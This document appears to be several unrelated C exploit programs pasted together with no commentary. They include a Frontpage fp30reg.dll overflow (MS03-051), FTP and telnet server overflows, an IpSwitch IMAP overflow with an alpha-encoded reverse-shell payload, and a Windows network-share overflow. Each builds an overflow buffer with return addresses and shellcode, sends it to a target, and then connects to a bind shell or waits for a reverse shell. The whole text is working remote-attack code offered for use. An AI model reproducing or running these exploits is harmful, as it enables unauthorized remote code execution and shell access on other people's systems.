int main(int argc,char *argv[])
{
WSADATA wsaData;
struct sockaddr_in targetTCP;
struct hostent *host;
int sockTCP,s;
unsigned short port = 80;
long ip;
unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
unsigned char packet[3000],data[1500];
unsigned char ecx[] = "\xe0\xf3\xd4\x67";
unsigned char edi[] = "\xff\xd0\x90\x90";
unsigned char call[] = "\xe4\xf3\xd4\x67";//overwrite .data section of fp30reg.dll
unsigned char shortjmp[] = "\xeb\x10";
printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n"
" by Adik < netmaniac [at] hotmail.KG >\n\n", VER);
if(argc < 2)
{
printf(" Usage: %s [Target] <port>\n"
" eg: fp30reg.exe 192.168.63.130\n\n",argv[0]);
return 1;
}
if(argc==3)
port = atoi(argv[2]);
WSAStartup(0x0202, &wsaData);
printf("[*] Target:\t%s \tPort: %d\n\n",argv[1],port);
ip=gimmeip(argv[1]);
memset(&targetTCP, 0, sizeof(targetTCP));
memset(packet,0,sizeof(packet));
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(port);
sprintf(packet,"%sHost: %s\r\nTransfer-Encoding: chunked\r\n",header,argv[1]);
memset(data, 0x90, sizeof(data)-1);
data[sizeof(data)-1] = '\x0';
memcpy(&data[16],edi,sizeof(edi)-1);
memcpy(&data[20],ecx,sizeof(ecx)-1);
memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);
memcpy(&data[250+14],call,sizeof(call)-1);
memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
sprintf(packet,"%sContent-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",packet,strlen(data),strlen(data),data);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
printf("[*] Socket initialized...\n");
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("[*] Connection to host failed! Exiting...\n");
WSACleanup();
exit(1);
}
printf("[*] Checking for presence of fp30reg.dll...");
if (send(sockTCP, packet, strlen(packet),0) == -1)
{
printf("[x] Failed to inject packet! Exiting...\n");
WSACleanup();
return 1;
}
memset(packet,0,sizeof(packet));
if (recv(sockTCP, packet, sizeof(packet),0) == -1)
{
printf("[x] Failed to receive packet! Exiting...\n");
WSACleanup();
return 1;
}
if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')
printf(" Found!\n");
else
{
printf(" Not Found!! Exiting...\n");
WSACleanup();
return 1;
}
printf("[*] Packet injected!\n");
closesocket(sockTCP);
printf("[*] Sleeping ");
for(s=0;s<13000;s+=1000)
{
printf(". ");
Sleep(1000);
}
printf("\n[*] Connecting to host: %s on port 9999",argv[1]);
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("\n[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(9999);
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("\n[x] Exploit failed or there is a Firewall! Exiting...\n");
WSACleanup();
exit(1);
}
printf("\n[*] Dropping to shell...\n\n");
cmdshell(sockTCP);
return 0;
}
int main(int argc, char *argv[]) {
int sock;
char expbuff[BUFSIZE];
char recvbuff[BUFSIZE];
void *p;
unsigned short tport = PORT; // default port for ftp
struct sockaddr_in target;
unsigned long retaddr;
int len,i=0;
unsigned int tar;
#ifdef WIN
WSADATA wsadata;
WSAStartup(MAKEWORD(2,0), &wsadata);
#endif
if(argc < 3) usage(argv[0]);
if(argc == 4)
tport = atoi(argv[3]);
banner();
tar = atoi(argv[2]);
retaddr = offsets[tar];
printf("- Using return address of 0x%8x : %s\n",retaddr,targets[tar]);
printf("\n[+] Initialize socket.");
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("[x] Error socket. Exiting...\n");
keepout();
}
memset(&target,0x00,sizeof(target));
target.sin_family = AF_INET;
target.sin_addr.s_addr = gimmeip(argv[1]);
target.sin_port = htons(tport);
printf("\n[+] Prepare exploit buffer... ");
memset(expbuff, 0x00, BUFSIZE);
memset(recvbuff, 0x00, BUFSIZE);
memcpy(expbuff, login[2], strlen(login[2]));
p = &expbuff[strlen(login[2]) ];
memset(p, NOP, LSZ);
memcpy(&expbuff[10],shellcode,sizeof(shellcode)-1);
*(unsigned long *)&expbuff[507] = retaddr;
p = &expbuff[511];
memcpy(p, "\n",1);
printf("\n[+] Connecting at %s:%hu...", argv[1], tport);
fflush(stdout);
if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) {
fprintf(stderr,"\n[x] Couldn't establish connection. Exiting...\n");
keepout();
}
printf(" - OK.\n");
len = recv(sock, recvbuff, BUFSIZE-1, 0);
if(len < 0) {
fprintf(stderr,"\nError response server\n");
exit(1);
}
printf(" - Size of payload is %d bytes",strlen(expbuff));
printf("\n[+] Initiating exploit... ");
printf("\n - Sending USER...");
if(send(sock,login[0],strlen(login[0]),0)==-1) {
fprintf(stderr,"\n[-] Exploit failed.\n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE-1,0);
if(len < 0) {
fprintf(stderr,"\nError recv.");
exit(1);
}
recvbuff[len] = 0;
printf("\n - Sending PASS...");
if(send(sock,login[1],strlen(login[1]),0)==-1) {
printf("\n[-] Exploit failed.\n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE, 0);
if(len < 0) {
fprintf(stderr,"\nError recv.");
exit(1);
}
recvbuff[len] = 0;
printf("\n - Creating X-DIR...");
if(send(sock,login[3],strlen(login[3]),0)==-1) {
printf("\n[-] Exploit failed.\n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE, 0);
if(len < 0) {
fprintf(stderr,"\nError recv.");
exit(1);
}
recvbuff[len] = 0;
if(send(sock,login[4],strlen(login[4]),0)==-1) {
printf("\n[-] Exploit failed.\n");
keepout();
}
len = recv(sock, recvbuff, BUFSIZE, 0);
if(len < 0) {
fprintf(stderr,"\nError recv.");
exit(1);
}
recvbuff[len] = 0;
printf("\n - Sending Exploit String...");
if(send(sock,expbuff,strlen(expbuff),0)==-1) {
printf("\n[-] Exploit failed.\n");
keepout();
}
printf("- OK.");
printf("\n[+] Now try to connect to the shell on %s:101\n", argv[1] );
#ifdef WIN
closesocket(sock);
WSACleanup();
#else
close(sock);
#endif
return(0);
}
int main(int argc, char *argv[]) {
int sock;
char expbuff[1024+500];
char recvbuff[512];
unsigned short tport = 23;
unsigned short port = 9191;
struct sockaddr_in target;
long retaddr = 0x77f9980f; // tested on WinXP (rus) + SP1
int len;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(2,0), &wsadata);
#endif
if(argc < 2) usage(argv[0]);
if(argc > 2) tport = atoi(argv[2]);
printf("\n[+] Prepare exploit buffer");
memset(expbuff, 0, sizeof(expbuff));
memset(recvbuff, 0, sizeof(recvbuff));
memset(&expbuff, 0x41, 528);
memcpy(&expbuff[512], (unsigned char *) &retaddr, 4);
memcpy(&expbuff[528], shellcode, sizeof(shellcode)-1);
memset(&target,0x00,sizeof(target));
target.sin_family = AF_INET;
target.sin_addr.s_addr = gimmeip(argv[1]);
target.sin_port = htons(tport);
printf("\n[+] Initialize socket.");
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("[x] Error socket. Exiting...\n");
keepout();
}
printf("\n[+] Try connecting to Telnet Server at %s:%hu...", argv[1], tport);
if (connect(sock,(struct sockaddr*)&target,sizeof(target))!=0) {
perror("\n [x] Couldn't establish connection. Exiting...\n");
keepout();
}
printf(" - OK.");
//printf("\n Wait for response");
len = recv(sock, recvbuff, sizeof(recvbuff), 0);
if(len < 0) {
perror("\nError response server");
exit(1);
}
printf("\n[+] Sending diabolic buffer");
if(send(sock,expbuff,strlen(expbuff),0)==-1) {
printf("[-] Sending failed or filtred");
keepout();
}
//printf("\n[i]Wait for response");
len = recv(sock, recvbuff, sizeof(recvbuff), 0);
if(len < 0) {
perror("\nError recv");
exit(1);
}
printf("\n[+] Now try connect to shell on 9191 port (et:nc -vv target 9191)");
#ifdef WIN32
closesocket(sock);
WSACleanup();
#else
close(sock);
#endif
return(0);
}
int main(int argc,char *argv[])
{
WSADATA wsaData;
struct sockaddr_in targetTCP;
int sockTCP;
unsigned short port = 143;
long ip;
if(argc < 5)
{
printf("IpSwitch IMAP server Remote Stack Overflow.\n"
"This exploit uses a reverse shell payload.\n"
"Usage: %s [retnaddr] [retport] [target] [address] <port_to_exploit>\n"
" eg: %s 192.168.1.94 1564 2 192.168.1.95\n"
"Targets:\n"
"1. Windows XP SP 0.\n2. Windows 2000 SP4\n3. Windows 2000 SP3\n"
"4. Windows 2000 SP2\n5. Windows 2000 SP1\n6. Windows 2000 SP0\n"
"Read comments in source code for more info.\n"
"Coded by nolimit@CiSO and BuzzDee.\n",argv[0],argv[0]);
return 1;
}
if(argc==6)
port = atoi(argv[5]);
WSAStartup(0x0202, &wsaData);
printf("[*] Target:\t%s \tPort: %d\n\n",argv[4],port);
ip=gimmeip(argv[4]);
targetTCP.sin_family = AF_INET;
targetTCP.sin_addr.s_addr = ip;
targetTCP.sin_port = htons(port);
//set ip/port specified. Probably could have done this easier, but whatever.
unsigned long revIp = gimmeip(argv[1]);
unsigned long *revPtr = (unsigned long *)&unEncShellcode;
revPtr = revPtr + (160/4); //go to ip place, it adds by 4, and it's 160 bytes away.
*revPtr = revIp;
char *portPtr = (char *)revPtr + 6; //ptr + 2 bytes past
int rPort = atoi(argv[2]);
char *revPortPtr = (char *)&rPort;
memcpy(portPtr,revPortPtr+1,1);
memcpy(portPtr+1,revPortPtr,1);
//done formatting, now lets encode it.
char *shellcode = alphaEncodeShellcode(unEncShellcode,sizeof(unEncShellcode));
paddingSize = 676 - strlen(shellcode);
//form buffer here.
memset(buffer,'\x00',2500);
strcpy(buffer,"A001 LOGIN user@");
memset(buffer+16,'\x41',paddingSize); //INC ECX nopslide
strcat(buffer,shellcode);
strcat(buffer,"r!s!"); //jmp over SE handler
switch(atoi(argv[3]))
{
case 1:
printf("[*] Targetting Windows XP SP 0..\n");
strcat(buffer,jmpXPSP0);
break;
case 2:
printf("[*] Targetting Windows 2000 SP4..\n");
strcat(buffer,jmp2KSP4);
break;
case 3:
printf("[*] Targetting Windows 2000 SP3..\n");
strcat(buffer,jmp2KSP3);
break;
case 4:
printf("[*] Targetting Windows 2000 SP2..\n");
strcat(buffer,jmp2KSP2);
break;
case 5:
printf("[*] Targetting Windows 2000 SP1..\n");
strcat(buffer,jmp2KSP1);
break;
case 6:
printf("[*] Targetting Windows 2000 SP0..\n");
strcat(buffer,jmp2KSP0);
break;
default:
printf("Target error.\n");
return 1;
break;
}
memset(buffer+strlen(buffer),'\x41',29);
strcat(buffer,jmpBack); //decodes to jmp back to top part of buffer
memset(buffer+strlen(buffer),'\x41',1323);
strcat(buffer," nolimits\r\n");
//buffer formed
if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
printf("[*] Socket initialized...\n");
if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
{
printf("[*] Connection to host failed! Exiting...\n");
WSACleanup();
exit(1);
}
printf("[*] Sending buffer.\n");
Sleep(1000);
if (send(sockTCP, buffer, strlen(buffer),0) == -1)
{
printf("[x] Failed to inject packet! Exiting...\n");
WSACleanup();
return 1;
}
Sleep(1000);
closesocket(sockTCP);
WSACleanup();
printf("Exploit sent. Reverse Shell should be comming if everyhing worked.\n");
return 0;
}
// ***************************************************************
int main(int argc,char *argv[])
{
WSADATA wsdata;
int sock;
unsigned short port = 9191;
struct sockaddr_in target;
unsigned long ip;
char opt;
int tgt_type = 0;
char *tgt_host;
if (argc<2) { usage(argv[0]); }
while((opt = getopt(argc,argv,"h:t:v"))!=EOF) {
switch(opt)
{
case 'h':
tgt_host = optarg;
snprintf(tgt_net,127, "\\\\%s", optarg);
snprintf(ipc,127, "\\\\%s\\ipc$", optarg);
break;
case 't':
tgt_type = atoi(optarg);
if (tgt_type == 0 || tgt_type > sizeof(targets) / 8) {
showtargets();
}
break;
default:
usage(argv[0]);
break;
}
}
printf("\n[+] Prepare exploit string\n");
memset(expl, 0x00, sizeof(expl));
memset(expl, 0x41, 2064);
memcpy(&expl[2044], (unsigned char *) &targets[tgt_type-1].jmpesp, 4);
//memcpy(&expl[2044], "BBBB", 4);
memcpy(&expl[2064], shellcode, sizeof(shellcode)); // begin shellcode here
memset(expl_uni, 0x00, sizeof(expl_uni));
memset(tgt_net_uni, 0x00, sizeof(tgt_net_uni));
mbstowcs(tgt_net_uni, tgt_net, sizeof(tgt_net));
switch(tgt_type) {
case 1:
case 3:
MultiByteToWideChar(CP_ACP, 0, expl, sizeof(expl), (unsigned short *)expl_uni,sizeof(expl_uni));
// MultiByteToWideChar - 100 % work at XP+SP0+Rollup
break;
case 2:
mbstowcs(expl_uni, expl, sizeof(expl)); // work at XP+SP1
break;
default:
mbstowcs(expl_uni, expl, sizeof(expl));
break;
}
beginthread(send_exp,0,NULL);
printf("[+] Sleep at 2s ... \n");
sleep(2000);
if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) {
printf("[x] WSAStartup error...\n");
WSACleanup();
return 1;
}
printf("[+] Initialize WSAStartup - OK\n");
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
printf("[x] Socket not initialized! Exiting...\n");
WSACleanup();
return 1;
}
printf("[*] Socket initialized - OK\n");
ip=gimmeip(tgt_host);
memset(&target, 0, sizeof(target));
target.sin_family=AF_INET;
target.sin_addr.s_addr = ip;
target.sin_port=htons(port);
printf("[+] Try connecting to %s:%d ...\n",tgt_host,port);
if(connect(sock,(struct sockaddr *)&target, sizeof(target))!=0) {
printf("\n[x] Exploit failed or is Filtred. Exiting...\n");
WSACleanup();
exit(1);
}
printf("[*] Connected to shell at %s:%d\n\n",inet_ntoa(target.sin_addr),port);
cmdshell2(sock);
closesocket(sock);
WSACleanup();
return 0;
}
